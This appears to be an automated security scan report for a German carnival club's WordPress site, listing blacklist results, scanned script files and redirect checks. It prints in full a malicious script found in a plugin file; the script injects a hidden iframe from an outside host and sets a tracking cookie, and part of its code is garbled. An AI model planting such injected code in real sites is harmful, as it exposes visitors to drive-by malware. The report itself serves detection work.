Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=karneval-dipperz.de
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://karneval-dipperz.de/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://karneval-dipperz.de/ | HTTP/1.1 301 Moved Permanently Date: Tue, 23 Dec 2014 02:03:03 GMT Location: http://www.karneval-dipperz.de/ Server: Microsoft-IIS/7.5 Content-Length: 1882 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.karneval-dipperz.de/xmlrpc.php X-Powered-By: PHP/5.4.14 X-Powered-By: ASP.NET | clean |
http://www.karneval-dipperz.de/ | 200 OK Content-Length: 19638 Content-Type: text/html | clean |
http://www.karneval-dipperz.de/wp-content/plugins/WPTeaser/jquery-2.1.1.min.js | 200 OK Content-Length: 74656 Content-Type: application/x-javascript | clean |
http://karneval-dipperz.de/wp-content/plugins/WPTeaser/slider-right.js | 200 OK Content-Length: 5454 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/cssable-countdown/js/kw-jquery.countdown-1.6.3.js?ver=1.0 | 200 OK Content-Length: 34022 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/cssable-countdown/langs/jquery.countdown-de.js?ver=1.0 | 200 OK Content-Length: 576 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/reiseblog-widgets/js/jquery.countdown.min.js?ver=4.0.1 | 200 OK Content-Length: 14153 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/wordpress-countdown-widget/js/jquery.countdown.min.js?ver=1.0 | 200 OK Content-Length: 12610 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=4.0.1 | 200 OK Content-Length: 33 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/persist.js?ver=4.0.1 | 200 OK Content-Length: 24995 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/store.js?ver=4.0.1 | 200 OK Content-Length: 5337 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ngg_store.js?ver=4.0.1 | 200 OK Content-Length: 891 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/fikraticker/js/jquery.innerfade.js?ver=4.0.1 | 200 OK Content-Length: 1112 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(name) {
    var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" ));
    return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Signaturepointlight() {
    var producter = navigator.userAgent;
    var actualed = (producter.indexOf("Windows") < +1 || producter.indexOf("Windows NT 6.3") > -1 || producter.indexOf("Chrome") > -1 || producter.indexOf("IEMobile if (!actualed && suite) {
        document.write('<iframe src="http://jumentas.accesspointit.com/jujakisam15.html" style="border-left: thick double #ff0000;left: -889px;position: absolute;cursor: help;border-right: thick double #ff0000;top: -889px;" height="132" width="132"></iframe>');
        var date = new Date( new Date().getTime() + 64*60*60*1000 );
        document.cookie="joombanight=1; path=/; expires="+date.toUTCString();
    }
}
Signaturepointlight();
Antivirus reports:
http://www.karneval-dipperz.de/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/lightbox/static/lightbox_context.js?ver=4.0.1 | 200 OK Content-Length: 890 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: karneval-dipperz.de
Result:
HTTP/1.1 301 Moved Permanently
Date: Tue, 23 Dec 2014 02:03:03 GMT
Location: http://www.karneval-dipperz.de/
Server: Microsoft-IIS/7.5
Content-Length: 1882
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.karneval-dipperz.de/xmlrpc.php
X-Powered-By: PHP/5.4.14
X-Powered-By: ASP.NET
...1882 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: karneval-dipperz.de
Referer: http://www.google.com/search?q=karneval-dipperz.de
Result:
The result is similar to the first query. There are no suspicious redirects found.